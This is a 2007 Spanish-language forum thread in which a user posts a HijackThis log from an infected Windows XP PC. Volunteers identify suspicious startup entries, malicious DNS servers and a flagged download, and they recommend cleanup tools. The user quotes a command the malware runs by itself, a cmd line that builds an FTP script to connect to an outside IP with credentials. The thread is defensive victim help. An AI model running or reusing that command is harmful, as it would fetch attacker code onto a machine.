Problemas con mi PC!!!

Thilson R. Guerra I. · Mensaje por **Thilson R. Guerra I.** » 03 Jun 2007, 01:48

Hola buenas tardes ante todo... El problema es que mi PC va lenta y creo q tiene Virus y Spywares, tambien se ejecutan paginas de internet solas y me gustaria saber si hay personas conectadas a mi computador.

aqui les dejo mi log:

Logfile of HijackThis v1.99.1

Scan saved at 05:33:49 p.m., on 06/02/2007

Platform: Windows XP SP2 (WinNT 5.01.2600)

MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)

Running processes:

C:\WINDOWS\System32\smss.exe

C:\WINDOWS\system32\winlogon.exe

C:\WINDOWS\system32\services.exe

C:\WINDOWS\system32\lsass.exe

C:\WINDOWS\system32\svchost.exe

C:\WINDOWS\System32\svchost.exe

C:\WINDOWS\system32\spoolsv.exe

C:\WINDOWS\system32\inetsrv\inetinfo.exe

c:\archivos de programa\mcafee.com\agent\mcdetect.exe

c:\ARCHIV~1\mcafee.com\agent\mctskshd.exe

C:\Archivos de programa\Archivos comunes\Microsoft Shared\VS7Debug\mdm.exe

C:\Archivos de programa\Microsoft Analysis Services\Bin\msmdsrv.exe

C:\Archivos de programa\Eset\nod32krn.exe

C:\WINDOWS\System32\svchost.exe

C:\Archivos de programa\RealVNC\VNC4\WinVNC4.exe

C:\WINDOWS\Explorer.EXE

C:\WINDOWS\system32\rundll32.exe

C:\Archivos de programa\Java\jre1.6.0_01\bin\jusched.exe

C:\Archivos de programa\QuickTime\qttask.exe

C:\ARCHIV~1\mcafee.com\agent\mcagent.exe

C:\Archivos de programa\Eset\nod32kui.exe

C:\WINDOWS\SOUNDMAN.EXE

C:\Archivos de programa\D-Tools\daemon.exe

C:\WINDOWS\system32\ctfmon.exe

C:\Archivos de programa\McAfee\McAfee QuickClean\Plguni.exe

C:\Archivos de programa\Archivos comunes\Ahead\Lib\NMBgMonitor.exe

C:\Archivos de programa\Archivos comunes\Ahead\Lib\NMIndexStoreSvr.exe

C:\Archivos de programa\Archivos comunes\Ahead\Lib\NMIndexingService.exe

C:\Archivos de programa\Internet Explorer\iexplore.exe

C:\Archivos de programa\Internet Explorer\iexplore.exe

C:\Documents and Settings\Thilson\Escritorio\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://g.t1msn.com.mx/0SEESMX/SAOS01?FORM=TOOLBR

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://g.t1msn.com.mx/0SEESMX/SAOS01?FORM=TOOLBR

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://es.yahoo.com/

R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =

R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://g.t1msn.com.mx/0SEESMX/SAOS01?FORM=TOOLBR

R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Vínculos

O4 - HKLM\..\Run: [AME_CSA] rundll32 amecsa.cpl,RUN_DLL

O4 - HKLM\..\Run: [RaidTool] C:\Archivos de programa\VIA\RAID\raid_to

O4 - HKLM\..\Run: [VTTimer] VTTimer.exe

O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Archivos de programa\Java\jre1.6.0_01\bin\jusched.exe"

O4 - HKLM\..\Run: [QuickTime Task] "C:\Archivos de programa\QuickTime\qttask.exe" -atboottime

O4 - HKLM\..\Run: [MCAgentExe] c:\ARCHIV~1\mcafee.com\agent\mcagent.exe

O4 - HKLM\..\Run: [MCUpdateExe] C:\ARCHIV~1\mcafee.com\agent\mcupdate.exe

O4 - HKLM\..\Run: [WinampAgent] C:\Archivos de programa\Winamp\winampa.exe

O4 - HKLM\..\Run: [MSKDetectorExe] C:\Archivos de programa\McAfee\SpamKiller\MSKDetct.exe /uninstall

O4 - HKLM\..\Run: [nod32kui] "C:\Archivos de programa\Eset\nod32kui.exe" /WAITSERVICE

O4 - HKLM\..\Run: [SoundMan] SOUNDMAN.EXE

O4 - HKLM\..\Run: [MSMSGNER] C:\WINDOWS\system32\a.exe

O4 - HKLM\..\Run: [netupdate32] winbackup16.exe

O4 - HKLM\..\Run: [DAEMON Tools-1033] "C:\Archivos de programa\D-Tools\daemon.exe" -lang 1033

O4 - HKLM\..\Run: [Genuine] rundll32.exe "C:\WINDOWS\system32\mjqxhila.dll",realset

O4 - HKLM\..\Run: [NeroFilterCheck] C:\Archivos de programa\Archivos comunes\Ahead\Lib\NeroCheck.exe

O4 - HKLM\..\RunServices: [netupdate32] winbackup16.exe

O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe

O4 - HKCU\..\Run: [MsnMsgr] "C:\Archivos de programa\MSN Messenger\MsnMsgr.Exe" /background

O4 - HKCU\..\Run: [McAfee QuickClean Imonitor] C:\Archivos de programa\McAfee\McAfee QuickClean\Plguni.exe /START

O4 - HKCU\..\Run: [BitTorrent] "C:\Archivos de programa\BitTorrent\bittorrent.exe" --force_start_minimized

O4 - HKCU\..\Run: [BgMonitor_{79662E04-7C6C-4d9f-84C7-88D8A56B10AA}] "C:\Archivos de programa\Archivos comunes\Ahead\Lib\NMBgMonitor.exe"

O4 - HKCU\..\Run: [STYLEXP] C:\Archivos de programa\TGTSoft\StyleXP\StyleXP.exe -Hide

O8 - Extra context menu item: E&xportar a Microsoft Excel - res://C:\ARCHIV~1\MICROS~2\OFFICE11\EXCEL.EXE/3000

O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Archivos de programa\Java\jre1.6.0_01\bin\ssv.dll

O9 - Extra 'Tools' menuitem: Consola de Sun Java - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Archivos de programa\Java\jre1.6.0_01\bin\ssv.dll

O9 - Extra button: Referencia - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\ARCHIV~1\MICROS~2\OFFICE11\REFIEBAR.DLL

O9 - Extra button: Run IMVU - {d9288080-1baa-4bc4-9cf8-a92d743db949} - C:\Documents and Settings\Thilson\Menú Inicio\Programas\IMVU\Run IMVU.lnk

O16 - DPF: {00B71CFB-6864-4346-A978-C0A14556272C} (Checkers Class) - http://messenger.zone.msn.com/binary/msgrchkr.cab31267.cab

O16 - DPF: {14B87622-7E19-4EA8-93B3-97215F77A6BC} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsPAClient.cab31267.cab

O16 - DPF: {2250C29C-C5E9-4F55-BE4E-01E45A40FCF1} (CMediaMix Object) - http://musicmix.messenger.msn.com/Medialogic.CAB

O16 - DPF: {2917297F-F02B-4B9D-81DF-494B6333150B} (Minesweeper Flags Class) - http://messenger.zone.msn.com/binary/MineSweeper.cab31267.cab

O16 - DPF: {4ED9DDF0-7479-4BBE-9335-5A1EDB1D8A21} (McAfee.com Operating System Class) - http://download.mcafee.com/molbin/shared/mcinsctl/4,0,0,101/mcinsctl.cab

O16 - DPF: {4F1E5B1A-2A80-42CA-8532-2D05CB959537} (MSN Photo Upload Tool) - http://koketoso.spaces.msn.com//PhotoUpload/MsnPUpld.cab

O16 - DPF: {55027008-315F-4F45-BBC3-8BE119764741} (Slide Image Uploader Control) - http://www.slide.com/uploader/SlideImageUploader.cab

O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1149521943482

O16 - DPF: {70BA88C8-DAE8-4CE9-92BB-979C4A75F53B} (GSDACtl Class) - http://launch.gamespyarcade.com/software/launch/alaunch.cab

O16 - DPF: {8E0D4DE5-3180-4024-A327-4DFAD1796A8D} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsClient.cab31267.cab

O16 - DPF: {AF2E62B6-F9E1-4D4F-A10A-9DC8E6DCBCC0} (VideoEgg ActiveX Loader) - http://update.videoegg.com/Install/Windows/Initial/VideoEggPublisher.exe

O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (ZoneIntro Class) - http://messenger.zone.msn.com/binary/ZIntro.cab47946.cab

O16 - DPF: {D6FCA8ED-4715-43DE-9BD2-2789778A5B09} - http://nprotect1.gravity.co.kr/nprotect/nPKeyCrypt/npkcx.cab

O16 - DPF: {E6187999-9FEC-46A1-A20F-F4CA977D5643} (ZoneChess Object) - http://messenger.zone.msn.com/binary/Chess.cab31267.cab

O16 - DPF: {E8F628B5-259A-4734-97EE-BA914D7BE941} (Driver Agent ActiveX Control) - http://driveragent.com/files/driveragent.cab

O16 - DPF: {F58E1CEF-A068-4C15-BA5E-587CAF3EE8C6} (MSN Chat Control 4.5) - http://www.ichatweb.com/plugins/msnchat45.cab

O17 - HKLM\System\CCS\Services\Tcpip\..\{74C743F5-DB84-4A3C-A094-F07AC2C9AF3E}: NameServer = 85.255.113.131,85.255.112.123

O17 - HKLM\System\CCS\Services\Tcpip\..\{ED08EF1F-CDBD-46FA-B9DF-7450AFA88AE7}: NameServer = 201.225.225.225,201.224.73.162

O18 - Protocol: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\ARCHIV~1\MSNMES~1\MSGRAP~1.DLL

O18 - Protocol: ms-help - {314111C7-A502-11D2-BBCA-00C04F8EC294} - C:\Archivos de programa\Archivos comunes\Microsoft Shared\Help\hxds.dll

O18 - Protocol: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\ARCHIV~1\MSNMES~1\MSGRAP~1.DLL

O21 - SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll

O23 - Service: McAfee WSC Integration (McDetect.exe) - McAfee, Inc - c:\archivos de programa\mcafee.com\agent\mcdetect.exe

O23 - Service: McAfee Task Scheduler (McTskshd.exe) - McAfee, Inc - c:\ARCHIV~1\mcafee.com\agent\mctskshd.exe

O23 - Service: McAfee SecurityCenter Update Manager (mcupdmgr.exe) - McAfee, Inc - C:\ARCHIV~1\McAfee.com\Agent\mcupdmgr.exe

O23 - Service: NBService - Nero AG - C:\Archivos de programa\Nero\Nero 7\Nero BackItUp\NBService.exe

O23 - Service: NMIndexingService - Nero AG - C:\Archivos de programa\Archivos comunes\Ahead\Lib\NMIndexingService.exe

O23 - Service: NOD32 Kernel Service (NOD32krn) - Eset - C:\Archivos de programa\Eset\nod32krn.exe

O23 - Service: npkcsvc - INCA Internet Co., Ltd. - C:\WINDOWS\system32\npkcsvc.exe

O23 - Service: StyleXPService - Unknown owner - C:\Archivos de programa\TGTSoft\StyleXP\StyleXPService.exe

O23 - Service: VNC Server Version 4 (WinVNC4) - Unknown owner - C:\Archivos de programa\RealVNC\VNC4\WinVNC4.exe" -service (file missing)

novatillo · Mensaje por **novatillo** » 03 Jun 2007, 02:06

De momento prueba elistar y elitriip hasta que te puendan echar un vistazo al log del hijackthis

ELISTARA

http://www.zonavirus.com/descargas/elistara.asp

ELITRIIP

http://www.zonavirus.com/descargas/elitriip.asp

Tras probarlo postea el contenido de C:/infosat.txt

Saludos.

Nuker · Mensaje por **Nuker** » 03 Jun 2007, 04:24

Se ven procesos muy sospechosos enviar muestras de estas:

C:\WINDOWS\system32\a.exe

C:\WINDOWS\system32\mjqxhila.dll

Como Enviar ?:

https://foros.zonavirus.com/viewtopic.php?f=2&t=45334

Y dentro del HijackThis elimina estas en Modo Seguro:

O4 - HKLM\..\Run: [netupdate32] winbackup16.exe

O4 - HKLM\..\RunServices: [netupdate32] winbackup16.exe

Estas la pongo por el RunServices.

Saludos y haz lo propuesto por novatillo también.

Mensaje por **msc hotline sat** » 03 Jun 2007, 10:15

Ahi tienes otra clave sospechosa:

O4 - HKLM\..\Run: [Genuine] rundll32.exe "C:\WINDOWS\system32\mjqxhila.dll",realset

y el que esta aplicacion sea lanzada desde estas dos, (RUN Y RUNSERVICES), como ya se indica en el anterior post, tambien lo hace necesario eliminar:

O4 - HKLM\..\Run: [netupdate32] winbackup16.exe

O4 - HKLM\..\RunServices: [netupdate32] winbackup16.exe

envianos muestra de dichos ficheros, mjqxhila.dll y winbackup16.exe , que posiblemente estén en la carpeta de sistema, para analizarlos

y este DPF tambien procede eliminarlo:

O16 - DPF: {D6FCA8ED-4715-43DE-9BD2-2789778A5B09} - http://nprotect1.gravity.co.kr/nprotect/nPKeyCrypt/npkcx.cab

pues 4 antivirus de Virustotal consideran malware al ficherod escargado por http://nprotect1.gravity.co.kr/nprotect/nPKeyCrypt/npkcx.cab

Ademas, espero que el ELISTARA te indicará que tienes configurados servidores de DNS maliciosos:

85.255.113.131,85.255.112.123

85.255.113.131 UA Ukraine 07 Kharkivs'ka Oblast' Kharkiv 50.0000 36.2500 Inhoster hosting company Inhoster hosting company

85.255.112.123 UA Ukraine 07 Kharkivs'ka Oblast' Kharkiv 50.0000 36.2500 Inhoster hosting company Inhoster hosting company

y por ultimo esta tambien es sospechosa:

O23 - Service: npkcsvc - INCA Internet Co., Ltd. - C:\WINDOWS\system32\npkcsvc.exe

al respecto de esta ultima, envianos muestra para analizar, pues la informacion es para considerarla malware !:

"npkcsvc.exe is a process which is registered as the Trojan-Downloader.Win32.Agent Trojan. This Trojan allows attackers to access your computer from remote locations, stealing passwords, Internet banking and personal data. This process is a security risk and should be removed from your system."

Y como que supongo sabe:

->~~[b]~~ Para ello recordar[/b]: https://foros.zonavirus.com/viewtopic.php?f=2&t=45334

saludos

ms, 3-06-2007

Thilson R. Guerra I. · Mensaje por **Thilson R. Guerra I.** » 04 Jun 2007, 23:49

Ante todo, muchas gracias por las respuestas, hice lo que me indicaron pero creo que ahora tengo otro problema... sucede que el ElistarA me detecta que el Servidor DNS no es el mismo que el de mi ISP solo como un mensaje, no lo limpia o elimina y la verdad no se como cambiarlo o que hacer en ese caso.

También muchas veces estoy haciendo algo en Internet o no estoy haciendo nada, la PC sola comienza a hacer sentencias; Inicio>Ejecutar> y escribe esto:

cmd /c echo open 201.29.40.247 21064 >> ik &echo user james 12198841 >

Me podrían decir ¿que es y como puedo eliminarlo?

Mensaje por **msc hotline sat** » 05 Jun 2007, 05:53

A Vd lo tenemos ubicado en Panama... Tiene alguna relacion con alguien de Rio de Janeiro, en el Brasil ??? porque la IP que nos indica corresponde a un usuario de allá...

Le pediamos muestra del fichero "npkcsvc.exe", nos lo ha enviado ???

[quote]y por ultimo esta tambien es sospechosa:

O23 - Service: npkcsvc - INCA Internet Co., Ltd. - C:\WINDOWS\system32\npkcsvc.exe

al respecto de esta ultima, envianos muestra para analizar, pues la informacion es para considerarla malware !:

"npkcsvc.exe is a process which is registered as the Trojan-Downloader.Win32.Agent Trojan. This Trojan allows attackers to access your computer from remote locations, stealing passwords, Internet banking and personal data. This process is a security risk and should be removed from your system."

Y como que supongo sabe:

Para ello recordar: https://foros.zonavirus.com/viewtopic.php?f=2&t=45334

[/quote]

y sobre la configuracion de servidores de DNS, cpon el buscador del foro hubioera encontrado muchos que decimos:

Tiene como servidores de DNS unos de UKRAINA y/o POLONIA considerados maliciosos:

85.255.113.131 UA Ukraine 07 Kharkivs'ka Oblast' Kharkiv 50.0000 36.2500 Inhoster hosting company Inhoster hosting company

85.255.112.123 UA Ukraine 07 Kharkivs'ka Oblast' Kharkiv 50.0000 36.2500 Inhoster hosting company Inhoster hosting company

Tras informarse con su ISP de cuales le recomiendan, puede probar cambiarlos con CONFGDNS.EXE

CONFGDNS.EXE

http://www.zonavirus.com/descargas/confgdns.asp

Y tras probar el CONFGDFNS e instalar los que le indique su ISP, quedaran configuradas las nuevas direcciones IP, confirme volviendo a lanzar el HJT que ya no figuran las maliciosas

Por otro lado, para eliminar la carga de la instruccion:

"cmd /c echo open 201.29.40.247 21064 >> ik &echo user james 12198841 > "

mire si con el BUSCAREG encuentra alguna clave que contenga "201.29.40.247" y nos lo indica como respuesta de este Tema, gracias

[size=150][color=darkblue]~~[b]~~BuscaReg[/b][/color][/size] (SATInfo)

Busca una cadena dentro del registro de windows, una vez encontradas permite borrarlas con tan solo pinchar encima de cada entrada encontrada, ademas realiza la exportacion de las claves eliminadas por si se necesitan restaurar las claves borradas.

[url=http://www.zonavirus.com/descargas/buscareg.asp]~~[b]~~Descargar BuscaReg[/b][/url]

Nota: Es posible que esten accediendo remotamente a su ordenador a traves del port 21064 desde dicha IP ... Independientemente de lo dicho, instale un cortafuegos !

saludos

ms, 5-06-2007

Problemas con mi PC!!!

Problemas con mi PC!!!

Otro Problema...